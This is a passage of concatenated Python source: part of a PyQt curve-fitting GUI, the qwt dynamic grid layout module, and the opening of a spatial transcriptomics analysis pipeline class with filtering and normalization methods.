ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["None", "None", "None"], ["None", "None", "None"],
["None", "None", "None"]])
elif params_num == 2:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
# Check if the selected fit function is Normalized Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Normalized Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["None", "None", "None"],
["None", "None", "None"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["None", "None", "None"],
["None", "None", "None"]])
elif params_num == 3:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
# Check if the selected fit function is Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["1", "-1000", "1000"],
["None", "None", "None"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["0", "-1000", "1000"],
["None", "None", "None"]])
elif params_num == 4:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(True)
# Check if the selected fit function is offset Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Offset Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["1", "-1000", "1000"],
["0", "-1000", "1000"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["0", "-1000", "1000"],
["0", "-1000", "1000"]])
def refresh_param_data_text(ui_analysis: UI_AnalysisWindow, text_arr):
ui_analysis.load_pages.lineEdit_analysis_initial_a.setText(text_arr[0][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setText(text_arr[0][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setText(text_arr[0][2])
ui_analysis.load_pages.lineEdit_analysis_initial_b.setText(text_arr[1][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setText(text_arr[1][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setText(text_arr[1][2])
ui_analysis.load_pages.lineEdit_analysis_initial_c.setText(text_arr[2][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setText(text_arr[2][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setText(text_arr[2][2])
ui_analysis.load_pages.lineEdit_analysis_initial_d.setText(text_arr[3][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setText(text_arr[3][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setText(text_arr[3][2])
def update_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
num_of_params = analysis.fit.get_func_par_num()
if num_of_params > 0:
ui_analysis.load_pages.lineEdit_analysis_param_a.setText(str(analysis.fit.get_a_parameter()))
if num_of_params > 1:
ui_analysis.load_pages.lineEdit_analysis_param_b.setText(str(analysis.fit.get_b_parameter()))
if num_of_params > 2:
ui_analysis.load_pages.lineEdit_analysis_param_c.setText(str(analysis.fit.get_c_parameter()))
if num_of_params > 3:
ui_analysis.load_pages.lineEdit_analysis_param_d.setText(str(analysis.fit.get_d_parameter()))
def update_parameters_error(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
num_of_params = analysis.fit.get_func_par_num()
if num_of_params > 0:
ui_analysis.load_pages.lineEdit_analysis_err_a.setText(str(analysis.fit.get_a_err_parameter()))
if num_of_params > 1:
ui_analysis.load_pages.lineEdit_analysis_err_b.setText(str(analysis.fit.get_b_err_parameter()))
if num_of_params > 2:
ui_analysis.load_pages.lineEdit_analysis_err_c.setText(str(analysis.fit.get_c_err_parameter()))
if num_of_params > 3:
ui_analysis.load_pages.lineEdit_analysis_err_d.setText(str(analysis.fit.get_d_err_parameter()))
# Return a two-element list of colors: one for the plot line, one for the plot symbol
def get_graph_colors(ui_analysis: UI_AnalysisWindow) -> list:
colors = [(55, 55, 55), "b", "g", "r", "c", "m", "y", "k", "w"]
plot_line_color = colors[ui_analysis.load_pages.comboBox_analysis_plot_line_color.currentIndex()]
plot_symbol_color = colors[ui_analysis.load_pages.comboBox_analysis_plot_symbol_color.currentIndex()]
return [plot_line_color, plot_symbol_color]
def set_data_2_graph(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
y = analysis.fit.get_y_array()
dx = analysis.fit.get_dx_array()
dy = analysis.fit.get_dy_array()
# Add error bar
if dx is not None and dy is not None:
ui_analysis.graph.addItem(
pg.ErrorBarItem(x=x, y=y, top=dy / 2, bottom=dy / 2, left=dx / 2, right=dx / 2, beam=0.5))
elif dy is not None:
ui_analysis.graph.addItem(pg.ErrorBarItem(x=x, y=y, top=dy / 2, bottom=dy / 2, beam=0.5))
ui_analysis.graph.plot(analysis.fit.get_x_array(), analysis.fit.get_y_array(),
symbol='o', pen=colors[0], symbolBrush=colors[1], symbolPen='w', symbolSize=8)
# Add titles and units
ui_analysis.graph.setTitle(title=ui_analysis.load_pages.lineEdit_analysis_main_title.text())
    # In pyqtgraph, 'bottom' is the x axis and 'left' is the y axis
    ui_analysis.graph.setLabel('bottom', ui_analysis.load_pages.lineEdit_analysis_x_title.text(),
                               units=ui_analysis.load_pages.lineEdit_analysis_x_units.text())
    ui_analysis.graph.setLabel('left', ui_analysis.load_pages.lineEdit_analysis_y_title.text(),
                               units=ui_analysis.load_pages.lineEdit_analysis_y_units.text())
def plot_opt_func(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
function = analysis.fit.get_function()
func_x = np.linspace(x[0], x[-1], 10000)
params = analysis.fit.get_params_array()
y_fit = function(func_x, *params)
ind = ui_analysis.load_pages.comboBox_analysis_fit_function.currentIndex()
ui_analysis.graph.plot(func_x, y_fit, pen=colors[0], name=analysis.fun_texts.fun_non_latex_texts_array[ind])
def plot_opt_func_with_uncertainties(opt: Minuit, analysis: Analysis, ui_analysis: UI_AnalysisWindow):
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
function = analysis.fit.get_function()
par_values = analysis.fit.get_params_array()
func_x = np.linspace(x[0], x[-1], 10000) # 10000 linearly spaced numbers
y_fit = function(func_x, *par_values)
ui_analysis.graph.plot(func_x, y_fit, pen=colors[0]) # plot the function over 10k points covering the x axis
def matplotlib_fit_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
pages = ui_analysis.load_pages
x = analysis.fit.get_x_array()
y = analysis.fit.get_y_array()
dx = analysis.fit.get_dx_array()
dy = analysis.fit.get_dy_array()
text = "$ Fitted \ to \ f(x) = {} $\n".format(analysis.fun_texts.fun_latex_texts_array[ui_analysis.load_pages.
comboBox_analysis_fit_function.currentIndex()])
ascii_prm = 97
for i in range(analysis.fit.get_func_par_num()):
text += "$\ \ \ %s$ = %0.4f $\pm$ %0.4f \n" % (
chr(ascii_prm + i), analysis.fit.get_params_array()[i], analysis.fit.get_err_array()[i])
text = text + "$\dfrac{{\chi}^2}{N_{dof}} = %0.4f(%0.4f/%d)$\n" % (
analysis.fit.get_chi_ndof(), analysis.fit.get_chi_ndof() * len(x),
len(x))
func_x = np.linspace(x[0], x[-1], 10000) # 10000 linearly spaced numbers
function = analysis.fit.get_function()
par_values = analysis.fit.get_params_array()
y_fit = function(func_x, *par_values)
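The per-parameter annotation text assembled above can be sketched as a standalone helper (the function name is hypothetical; the `±` glyph is rendered by matplotlib's mathtext in the original):

```python
def fit_annotation(params, errors):
    # Sketch of the legend lines built in matplotlib_fit_analysis_data:
    # one "a = value ± error" line per fitted parameter, labelled a, b, c, ...
    lines = []
    for i, (p, e) in enumerate(zip(params, errors)):
        lines.append("%s = %0.4f ± %0.4f" % (chr(ord("a") + i), p, e))
    return "\n".join(lines)

print(fit_annotation([1.5, -0.25], [0.02, 0.01]))
```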
# Lib/site-packages/qwt/dyngrid_layout.py
# -*- coding: utf-8 -*-
#
# Licensed under the terms of the Qwt License
# Copyright (c) 2002 <NAME>, for the original C++ code
# Copyright (c) 2015 <NAME>, for the Python translation/optimization
# (see LICENSE file for more details)
"""
qwt.dyngrid_layout
------------------
The `dyngrid_layout` module provides the `QwtDynGridLayout` class.
.. autoclass:: QwtDynGridLayout
:members:
"""
from qtpy.QtWidgets import QLayout
from qtpy.QtCore import Qt, QRect, QSize
class QwtDynGridLayout_PrivateData(object):
def __init__(self):
self.isDirty = True
self.maxColumns = 0
self.numRows = 0
self.numColumns = 0
self.expanding = Qt.Orientations()
self.itemSizeHints = []
self.itemList = []
def updateLayoutCache(self):
self.itemSizeHints = [it.sizeHint() for it in self.itemList]
self.isDirty = False
class QwtDynGridLayout(QLayout):
"""
The `QwtDynGridLayout` class lays out widgets in a grid,
adjusting the number of columns and rows to the current size.
`QwtDynGridLayout` takes the space it gets, divides it up into rows and
columns, and puts each of the widgets it manages into the correct cell(s).
    It lays out as many columns as possible (limited by
    :py:meth:`maxColumns()`).
.. py:class:: QwtDynGridLayout(parent, margin, [spacing=-1])
:param QWidget parent: parent widget
:param int margin: margin
:param int spacing: spacing
.. py:class:: QwtDynGridLayout(spacing)
:noindex:
:param int spacing: spacing
.. py:class:: QwtDynGridLayout()
:noindex:
Initialize the layout with default values.
"""
def __init__(self, *args):
self.__data = None
parent = None
margin = 0
spacing = -1
if len(args) in (2, 3):
parent, margin = args[:2]
if len(args) == 3:
spacing = args[-1]
elif len(args) == 1:
if isinstance(args[0], int):
(spacing,) = args
else:
(parent,) = args
elif len(args) != 0:
raise TypeError(
"%s() takes 0, 1, 2 or 3 argument(s) (%s given)"
% (self.__class__.__name__, len(args))
)
QLayout.__init__(self, parent)
self.__data = QwtDynGridLayout_PrivateData()
self.setSpacing(spacing)
self.setContentsMargins(margin, margin, margin, margin)
def invalidate(self):
"""Invalidate all internal caches"""
self.__data.isDirty = True
QLayout.invalidate(self)
def setMaxColumns(self, maxColumns):
"""Limit the number of columns"""
self.__data.maxColumns = maxColumns
def maxColumns(self):
"""Return the upper limit for the number of columns"""
return self.__data.maxColumns
def addItem(self, item):
"""Add an item to the next free position"""
self.__data.itemList.append(item)
self.invalidate()
def isEmpty(self):
"""Return true if this layout is empty"""
return self.count() == 0
def itemCount(self):
"""Return number of layout items"""
return self.count()
def itemAt(self, index):
"""Find the item at a specific index"""
if index < 0 or index >= len(self.__data.itemList):
return
return self.__data.itemList[index]
def takeAt(self, index):
"""Find the item at a specific index and remove it from the layout"""
if index < 0 or index >= len(self.__data.itemList):
return
self.__data.isDirty = True
return self.__data.itemList.pop(index)
def count(self):
"""Return Number of items in the layout"""
return len(self.__data.itemList)
def setExpandingDirections(self, expanding):
"""
Set whether this layout can make use of more space than sizeHint().
A value of Qt.Vertical or Qt.Horizontal means that it wants to grow in
only one dimension, while Qt.Vertical | Qt.Horizontal means that it
wants to grow in both dimensions. The default value is 0.
"""
self.__data.expanding = expanding
def expandingDirections(self):
"""
Returns whether this layout can make use of more space than sizeHint().
A value of Qt.Vertical or Qt.Horizontal means that it wants to grow in
only one dimension, while Qt.Vertical | Qt.Horizontal means that it
wants to grow in both dimensions.
"""
return self.__data.expanding
def setGeometry(self, rect):
"""
Reorganizes columns and rows and resizes managed items within a
rectangle.
"""
QLayout.setGeometry(self, rect)
if self.isEmpty():
return
self.__data.numColumns = self.columnsForWidth(rect.width())
        self.__data.numRows = self.itemCount() // self.__data.numColumns
        if self.itemCount() % self.__data.numColumns:
            self.__data.numRows += 1
itemGeometries = self.layoutItems(rect, self.__data.numColumns)
for it, geo in zip(self.__data.itemList, itemGeometries):
it.setGeometry(geo)
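The row count in `setGeometry` is a ceiling division of the item count by the column count; a minimal sketch (helper name assumed):

```python
def rows_for(item_count, num_columns):
    # Ceiling division: a last, partially filled row still counts as a row.
    return -(-item_count // num_columns)

print(rows_for(7, 3))  # -> 3
```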
def columnsForWidth(self, width):
"""
Calculate the number of columns for a given width.
The calculation tries to use as many columns as possible
(limited by maxColumns())
"""
if self.isEmpty():
return 0
maxColumns = self.itemCount()
if self.__data.maxColumns > 0:
maxColumns = min([self.__data.maxColumns, maxColumns])
if self.maxRowWidth(maxColumns) <= width:
return maxColumns
for numColumns in range(2, maxColumns + 1):
rowWidth = self.maxRowWidth(numColumns)
if rowWidth > width:
return numColumns - 1
return 1
def maxRowWidth(self, numColumns):
"""Calculate the width of a layout for a given number of columns."""
colWidth = [0] * numColumns
if self.__data.isDirty:
self.__data.updateLayoutCache()
for index, hint in enumerate(self.__data.itemSizeHints):
col = index % numColumns
colWidth[col] = max([colWidth[col], hint.width()])
margins = self.contentsMargins()
margin_w = margins.left() + margins.right()
return margin_w + (numColumns - 1) * self.spacing() + sum(colWidth)
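The row-width formula above (outer margins plus inter-column spacing plus the column widths) can be checked in isolation. This is a sketch with made-up pixel values; `max_row_width` is a hypothetical standalone helper, not part of the class:

```python
def max_row_width(col_widths, spacing, margin_left, margin_right):
    # Row width = left/right margins + (n - 1) spacing gaps + column widths.
    return margin_left + margin_right + (len(col_widths) - 1) * spacing + sum(col_widths)

print(max_row_width([30, 40, 50], 6, 5, 5))  # 142
```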
def maxItemWidth(self):
"""Return the maximum width of all layout items"""
if self.isEmpty():
return 0
if self.__data.isDirty:
self.__data.updateLayoutCache()
return max([hint.width() for hint in self.__data.itemSizeHints])
def layoutItems(self, rect, numColumns):
"""
Calculate the geometries of the layout items for a layout
with numColumns columns and a given rectangle.
"""
itemGeometries = []
if numColumns == 0 or self.isEmpty():
return itemGeometries
numRows = self.itemCount() // numColumns
if self.itemCount() % numColumns:
numRows += 1
if numRows == 0:
return itemGeometries
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
expandH = self.expandingDirections() & Qt.Horizontal
expandV = self.expandingDirections() & Qt.Vertical
if expandH or expandV:
self.stretchGrid(rect, numColumns, rowHeight, colWidth)
maxColumns = self.__data.maxColumns
self.__data.maxColumns = numColumns
alignedRect = self.alignmentRect(rect)
self.__data.maxColumns = maxColumns
xOffset = 0 if expandH else alignedRect.x()
yOffset = 0 if expandV else alignedRect.y()
colX = [0] * numColumns
rowY = [0] * numRows
xySpace = self.spacing()
margins = self.contentsMargins()
rowY[0] = yOffset + margins.top()
for r in range(1, numRows):
rowY[r] = rowY[r - 1] + rowHeight[r - 1] + xySpace
colX[0] = xOffset + margins.left()
for c in range(1, numColumns):
colX[c] = colX[c - 1] + colWidth[c - 1] + xySpace
itemCount = len(self.__data.itemList)
for i in range(itemCount):
row = i // numColumns
col = i % numColumns
itemGeometry = QRect(colX[col], rowY[row], colWidth[col], rowHeight[row])
itemGeometries.append(itemGeometry)
return itemGeometries
def layoutGrid(self, numColumns, rowHeight, colWidth):
"""
Calculate the dimensions for the columns and rows for a grid
of numColumns columns.
"""
if numColumns <= 0:
return
if self.__data.isDirty:
self.__data.updateLayoutCache()
for index in range(len(self.__data.itemSizeHints)):
row = index // numColumns
col = index % numColumns
size = self.__data.itemSizeHints[index]
if col == 0:
rowHeight[row] = size.height()
else:
rowHeight[row] = max([rowHeight[row], size.height()])
if row == 0:
colWidth[col] = size.width()
else:
colWidth[col] = max([colWidth[col], size.width()])
def hasHeightForWidth(self):
"""Return true: QwtDynGridLayout implements heightForWidth()."""
return True
def heightForWidth(self, width):
"""Return The preferred height for this layout, given a width."""
if self.isEmpty():
return 0
numColumns = self.columnsForWidth(width)
numRows = self.itemCount() // numColumns
if self.itemCount() % numColumns:
numRows += 1
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
margins = self.contentsMargins()
margin_h = margins.top() + margins.bottom()
return margin_h + (numRows - 1) * self.spacing() + sum(rowHeight)
def stretchGrid(self, rect, numColumns, rowHeight, colWidth):
"""
Stretch columns in case of expanding() & QSizePolicy::Horizontal and
rows in case of expanding() & QSizePolicy::Vertical to fill the entire
rect. Rows and columns are stretched with the same factor.
"""
if numColumns == 0 or self.isEmpty():
return
expandH = self.expandingDirections() & Qt.Horizontal
expandV = self.expandingDirections() & Qt.Vertical
if expandH:
xDelta = (
rect.width() - 2 * self.margin() - (numColumns - 1) * self.spacing()
)
for col in range(numColumns):
xDelta -= colWidth[col]
if xDelta > 0:
for col in range(numColumns):
space = xDelta // (numColumns - col)
colWidth[col] += space
xDelta -= space
if expandV:
numRows = self.itemCount() // numColumns
if self.itemCount() % numColumns:
numRows += 1
yDelta = rect.height() - 2 * self.margin() - (numRows - 1) * self.spacing()
for row in range(numRows):
yDelta -= rowHeight[row]
if yDelta > 0:
for row in range(numRows):
space = yDelta // (numRows - row)
rowHeight[row] += space
yDelta -= space
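The pixel-distribution loop used in stretchGrid (hand out `delta // remaining` at each step, so rounding leftovers accumulate on the later entries) can be sketched as a standalone function; `distribute` is a hypothetical helper for illustration:

```python
def distribute(delta, sizes):
    # Spread `delta` extra pixels across `sizes`: each step hands out an
    # equal integer share of what remains, so remainders land on later entries.
    sizes = list(sizes)
    n = len(sizes)
    for i in range(n):
        space = delta // (n - i)
        sizes[i] += space
        delta -= space
    return sizes

print(distribute(10, [20, 20, 20]))  # [23, 23, 24]
```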
def sizeHint(self):
"""
Return the size hint. If maxColumns() > 0 it is the size for
a grid with maxColumns() columns, otherwise it is the size for
a grid with only one row.
"""
if self.isEmpty():
return QSize()
numColumns = self.itemCount()
if self.__data.maxColumns > 0:
numColumns = min([self.__data.maxColumns, numColumns])
numRows = self.itemCount() // numColumns
if self.itemCount() % numColumns:
numRows += 1
rowHeight = [0] * numRows
colWidth = [0] * numColumns
self.layoutGrid(numColumns, rowHeight, colWidth)
margins = self.contentsMargins()
margin_h = margins.top() + margins.bottom()
margin_w = margins.left() + margins.right()
h = margin_h + (numRows - 1) * self.spacing() + sum(rowHeight)
w = margin_w + (numColumns - 1) * self.spacing() + sum(colWidth)
return QSize(w, h)
#!/usr/bin/env python3
# coding: utf-8
"""
@file: st_pipeline.py
@description:
@author: <NAME>
@email: <EMAIL>
@last modified by: <NAME>
change log:
2021/07/20 create file.
"""
from ..preprocess.qc import cal_qc
from ..preprocess.filter import filter_cells, filter_genes, filter_coordinates
from ..algorithm.normalization import normalize_total, quantile_norm, zscore_disksmooth
import numpy as np
from scipy.sparse import issparse
from ..algorithm.dim_reduce import pca, u_map
from typing import Optional, Union
import copy
from ..algorithm.neighbors import find_neighbors
import phenograph as phe
import pandas as pd
from ..algorithm.leiden import leiden as le
from ..algorithm._louvain import louvain as lo
from typing_extensions import Literal
from ..log_manager import logger
import functools
def logit(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
logger.info('start to run {}...'.format(func.__name__))
res = func(*args, **kwargs)
logger.info('{} end.'.format(func.__name__))
return res
return wrapped
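The `logit` wrapper above follows a standard logging-decorator pattern. A self-contained sketch (using the stdlib `logging` module and a made-up function name; `functools.wraps` keeps the wrapped function's name and docstring intact):

```python
import functools
import logging

logging.basicConfig(level=logging.INFO)
_log = logging.getLogger(__name__)

def logged(func):
    # Log entry/exit around the wrapped call; wraps() preserves metadata.
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        _log.info("start to run %s...", func.__name__)
        res = func(*args, **kwargs)
        _log.info("%s end.", func.__name__)
        return res
    return wrapped

@logged
def add(a, b):
    return a + b

print(add(2, 3))          # 5
print(add.__name__)       # add (not "wrapped", thanks to functools.wraps)
```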
class StPipeline(object):
def __init__(self, data):
"""
An analysis toolset for StereoExpData, including preprocessing, filtering, clustering, plotting and so on.
:param data: StereoExpData object.
"""
self.data = data
self.result = dict()
self._raw = None
self.key_record = {'hvg': [], 'pca': [], 'neighbors': [], 'umap': [], 'cluster': [], 'marker_genes': []}
@property
def raw(self):
"""
Get the StereoExpData whose exp_matrix holds the raw counts.
:return:
"""
return self._raw
@raw.setter
def raw(self, value):
"""
set the raw data.
:param value: StereoExpData.
:return:
"""
self._raw = copy.deepcopy(value)
def reset_raw_data(self):
"""
reset the self.data to the raw data.
:return:
"""
self.data = self.raw
def raw_checkpoint(self):
self.raw = self.data
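The `raw` setter deep-copies its value, so `raw_checkpoint` snapshots the data before destructive steps. A minimal sketch of that pattern with a made-up `Holder` class:

```python
import copy

class Holder:
    # The setter deep-copies, so later mutation of the live object
    # leaves the snapshot intact.
    def __init__(self):
        self._raw = None

    @property
    def raw(self):
        return self._raw

    @raw.setter
    def raw(self, value):
        self._raw = copy.deepcopy(value)

h = Holder()
data = {"counts": [1, 2, 3]}
h.raw = data            # checkpoint
data["counts"].append(4)  # mutate the live object afterwards
print(h.raw)            # {'counts': [1, 2, 3]}
```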
def reset_key_record(self, key, res_key):
"""
Reset the key and corresponding res_key in key_record.
:param key:
:param res_key:
:return:
"""
if key in self.key_record.keys():
if res_key in self.key_record[key]:
self.key_record[key].remove(res_key)
self.key_record[key].append(res_key)
else:
self.key_record[key] = [res_key]
@logit
def cal_qc(self):
"""
Calculate three QC metrics: the number of genes expressed in the count matrix, the total counts per cell,
and the percentage of counts in mitochondrial genes.
:return:
"""
cal_qc(self.data)
@logit
def filter_cells(self, min_gene=None, max_gene=None, min_n_genes_by_counts=None, max_n_genes_by_counts=None,
pct_counts_mt=None, cell_list=None, inplace=True):
"""
Filter cells based on the number of genes expressed.
:param min_gene: Minimum number of genes expressed for a cell to pass filtering.
:param max_gene: Maximum number of genes expressed for a cell to pass filtering.
:param min_n_genes_by_counts: Minimum n_genes_by_counts for a cell to pass filtering.
:param max_n_genes_by_counts: Maximum n_genes_by_counts for a cell to pass filtering.
:param pct_counts_mt: Maximum pct_counts_mt for a cell to pass filtering.
:param cell_list: the list of cells to be filtered.
:param inplace: whether to modify the original data in place or return a new object.
:return:
"""
data = filter_cells(self.data, min_gene, max_gene, min_n_genes_by_counts, max_n_genes_by_counts, pct_counts_mt,
cell_list, inplace)
return data
@logit
def filter_genes(self, min_cell=None, max_cell=None, gene_list=None, inplace=True):
"""
Filter genes based on the number of cells expressing them.
:param min_cell: Minimum number of cells for a gene to pass filtering.
:param max_cell: Maximum number of cells for a gene to pass filtering.
:param gene_list: the list of genes to be filtered.
:param inplace: whether to modify the original data in place or return a new object.
:return:
"""
data = filter_genes(self.data, min_cell, max_cell, gene_list, inplace)
return data
@logit
def filter_coordinates(self, min_x=None, max_x=None, min_y=None, max_y=None, inplace=True):
"""
Filter cells based on their coordinates.
:param min_x: Minimum x for a cell to pass filtering.
:param max_x: Maximum x for a cell to pass filtering.
:param min_y: Minimum y for a cell to pass filtering.
:param max_y: Maximum y for a cell to pass filtering.
:param inplace: whether to modify the original data in place or return a new object.
:return:
"""
data = filter_coordinates(self.data, min_x, max_x, min_y, max_y, inplace)
return data
@logit
def log1p(self, inplace=True, res_key='log1p'):
"""
Apply log1p to the expression matrix.
:param inplace: whether to transform the expression matrix in place or store the result in self.result.
:param res_key: the key for getting the result from self.result.
:return:
"""
if inplace:
self.data.exp_matrix = np.log1p(self.data.exp_matrix)
else:
self.result[res_key] = np.log1p(self.data.exp_matrix)
@logit
def normalize_total(self, target_sum=10000, inplace=True, res_key='normalize_total'):
"""
Total-count normalize the data to `target_sum` reads per cell, so that counts become comparable among cells.
:param target_sum: the number of reads per cell after normalization.
:param inplace: whether to normalize the expression matrix in place or store the result in self.result.
:param res_key: the key for getting the result from self.result.
:return:
"""
if inplace:
self.data.exp_matrix = normalize_total(self.data.exp_matrix, target_sum=target_sum)
else:
self.result[res_key] = normalize_total(self.data.exp_matrix, target_sum=target_sum)
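Total-count normalization scales every cell (row) so its counts sum to `target_sum`. A minimal dense-NumPy sketch; `normalize_total_sketch` is a hypothetical stand-in for the imported `normalize_total`, not its actual implementation:

```python
import numpy as np

def normalize_total_sketch(x, target_sum=10000):
    # Rows are cells: scale each row so its counts sum to target_sum.
    counts = x.sum(axis=1, keepdims=True)
    return x / counts * target_sum

x = np.array([[1.0, 3.0], [5.0, 5.0]])
y = normalize_total_sketch(x, target_sum=100)
print(y)  # [[25. 75.] [50. 50.]] -- every row sums to 100
```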
@logit
def quantile(self, inplace=True, res_key='quantile'):
"""
Normalize the columns of X to each have the same distribution. Given an expression matrix of M genes by N
samples, quantile normalization ensures all samples have the same spread of data (by construction).
:param inplace: whether to normalize the expression matrix in place or store the result in self.result.
:param res_key: the key for getting the result from self.result.
:return:
"""
if issparse(self.data.exp_matrix):
self.data.exp_matrix = self.data.exp_matrix.toarray()
if inplace:
self.data.exp_matrix = quantile_norm(self.data.exp_matrix)
else:
self.result[res_key] = quantile_norm(self.data.exp_matrix)
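Quantile normalization forces every column (sample) onto the same distribution: sort each column, average the sorted profiles, then map values back by within-column rank. A small sketch under those assumptions; `quantile_norm_sketch` is a hypothetical illustration, not the imported `quantile_norm`:

```python
import numpy as np

def quantile_norm_sketch(x):
    # Rank each value within its column, then assign the mean sorted
    # profile back by rank, so all columns share one distribution.
    ranks = np.argsort(np.argsort(x, axis=0), axis=0)
    mean_sorted = np.sort(x, axis=0).mean(axis=1)
    return mean_sorted[ranks]

x = np.array([[5.0, 4.0], [2.0, 1.0], [3.0, 6.0]])
print(quantile_norm_sketch(x))  # [[5.5 3.5] [1.5 1.5] [3.5 5.5]]
```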
@logit
def disksmooth_zscore(self, r=20, inplace=True, res_key='disksmooth_zscore'):
"""
For each position, given a radius, calculate the z-score within this circle as the final normalized value.
:param r: radius for normalization.
